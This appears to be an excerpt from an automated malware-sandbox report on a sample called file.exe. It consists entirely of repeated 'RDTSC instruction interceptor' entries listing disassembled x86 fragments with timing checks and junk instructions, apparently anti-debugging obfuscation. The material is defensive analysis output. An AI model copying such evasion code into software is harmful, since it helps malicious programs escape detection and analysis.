                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5162E second address: B516AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE784D2BEBCh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FE784D2BEB8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D2DABh] 0x00000032 mov edi, esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FE784D2BEB8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov di, dx 0x00000053 push 00000000h 0x00000055 jc 00007FE784D2BEB6h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50727 second address: B50746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B516AA second address: B516AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D137 second address: B4D1D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FE784B99A28h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 and bx, 7C94h 0x00000037 xor ebx, 16CD7C3Eh 0x0000003d mov eax, dword ptr [ebp+122D0039h] 0x00000043 mov bx, si 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007FE784B99A28h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000014h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 call 00007FE784B99A37h 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 pop ebx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e push ebx 0x0000006f pop ebx 0x00000070 push ecx 0x00000071 pop ecx 0x00000072 popad 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B516AF second address: B516B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D1D4 second address: B4D1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52730 second address: B52735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52735 second address: B5274A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FE784B99A26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B517EA second address: B517FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FE784D2BEB8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B518AB second address: B518D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FE784B99A34h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5293E second address: B5295D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE784D2BEC3h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5784B second address: B578A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007FE784B99A30h 0x0000000d nop 0x0000000e pushad 0x0000000f movzx edi, di 0x00000012 mov dword ptr [ebp+122D2B82h], edx 0x00000018 popad 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c adc eax, 1501A958h 0x00000022 popad 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FE784B99A28h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B578A4 second address: B578A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B578A8 second address: B578C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FE784B99A2Ch 0x0000000c popad 0x0000000d push eax 0x0000000e js 00007FE784B99A34h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5996E second address: B59972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59972 second address: B59978 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59978 second address: B59993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784D2BEC7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8C7 second address: B5A8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8CD second address: B5A8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8D1 second address: B5A8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE784B99A39h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8F6 second address: B5A8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8FA second address: B5A904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57A52 second address: B57AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FE784D2BEB8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov bx, 465Fh 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FE784D2BEB8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 mov eax, dword ptr [ebp+122D1075h] 0x00000056 push 00000000h 0x00000058 push ebx 0x00000059 call 00007FE784D2BEB8h 0x0000005e pop ebx 0x0000005f mov dword ptr [esp+04h], ebx 0x00000063 add dword ptr [esp+04h], 00000014h 0x0000006b inc ebx 0x0000006c push ebx 0x0000006d ret 0x0000006e pop ebx 0x0000006f ret 0x00000070 mov edi, dword ptr [ebp+122D2689h] 0x00000076 push FFFFFFFFh 0x00000078 mov bx, 0F05h 0x0000007c nop 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007FE784D2BEBBh 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B83C second address: B5B851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784B99A31h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B851 second address: B5B8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE784D2BEBAh 0x0000000e nop 0x0000000f jmp 00007FE784D2BEC5h 0x00000014 push 00000000h 0x00000016 sub dword ptr [ebp+122D1EA6h], ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FE784D2BEB8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 mov di, A1EAh 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FE784D2BEC8h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59B56 second address: B59B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B8BF second address: B5B8EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE784D2BEBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE784D2BEC8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59B5B second address: B59B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DA74 second address: B5DA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DA78 second address: B5DB18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FE784B99A28h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov bl, 14h 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D27DDh] 0x00000030 and di, AFC1h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007FE784B99A28h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 adc edi, 7AF9405Dh 0x00000057 xchg eax, esi 0x00000058 jmp 00007FE784B99A36h 0x0000005d push eax 0x0000005e pushad 0x0000005f jnl 00007FE784B99A28h 0x00000065 je 00007FE784B99A2Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DC7D second address: B5DC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DC83 second address: B5DC90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DC90 second address: B5DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE784D2BEC6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6112A second address: B6112F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6112F second address: B61151 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66904 second address: B66908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66908 second address: B66926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FE784D2BEC4h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66926 second address: B66946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jp 00007FE784B99A2Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66C13 second address: B66C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jns 00007FE784D2BEBEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FE784D2BEB6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66D3D second address: B66D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66D43 second address: B66D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE784D2BEC4h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66D61 second address: B66D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A2Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66D79 second address: B66D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C642 second address: B6C648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C648 second address: B6C64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C64E second address: B6C652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DB18 second address: B6DB29 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE784D2BEB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DB29 second address: B6DB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FE784B99A30h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 jg 00007FE784B99A2Ch 0x00000016 jl 00007FE784B99A26h 0x0000001c pop esi 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jmp 00007FE784B99A36h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DB6E second address: B6DB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6DD79 second address: B6DD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71989 second address: B719A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B719A4 second address: B719C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE784B99A37h 0x0000000d jl 00007FE784B99A26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F28 second address: B71F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F2C second address: B71F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE784B99A30h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F46 second address: B71F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F4C second address: B71F6F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE784B99A3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71F6F second address: B71F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72254 second address: B7226C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A32h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7226C second address: B72270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B723BF second address: B723C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B723C5 second address: B723E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FE784D2BEBAh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FE784D2BEB6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B726B9 second address: B726C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72986 second address: B7299D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEBCh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7299D second address: B729FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE784B99A26h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE784B99A33h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jnc 00007FE784B99A26h 0x0000001b jmp 00007FE784B99A39h 0x00000020 jmp 00007FE784B99A33h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 js 00007FE784B99A2Ah 0x0000002e push edi 0x0000002f pop edi 0x00000030 push eax 0x00000031 pop eax 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B729FF second address: B72A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72A07 second address: B72A1F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE784B99A2Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72BB5 second address: B72BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72BBB second address: B72BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE784B99A26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72BC6 second address: B72BEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE784D2BEC8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7433C second address: B7435D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jl 00007FE784B99A3Fh 0x0000000c jmp 00007FE784B99A33h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79DB1 second address: B79DB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79109 second address: B7911E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784B99A31h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7911E second address: B79170 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE784D2BEB6h 0x00000008 jmp 00007FE784D2BEC0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE784D2BEBBh 0x00000014 jng 00007FE784D2BEBCh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007FE784D2BEBCh 0x00000023 jc 00007FE784D2BEB6h 0x00000029 jmp 00007FE784D2BEC2h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79170 second address: B79175 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79175 second address: B7917E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78745 second address: B7875D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784B99A34h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D7E7 second address: B7D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE784D2BEBCh 0x0000000a jno 00007FE784D2BEB6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7D7F7 second address: B7D80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784B99A30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83421 second address: B83440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEC4h 0x00000009 jo 00007FE784D2BEB6h 0x0000000f popad 0x00000010 rdtsc
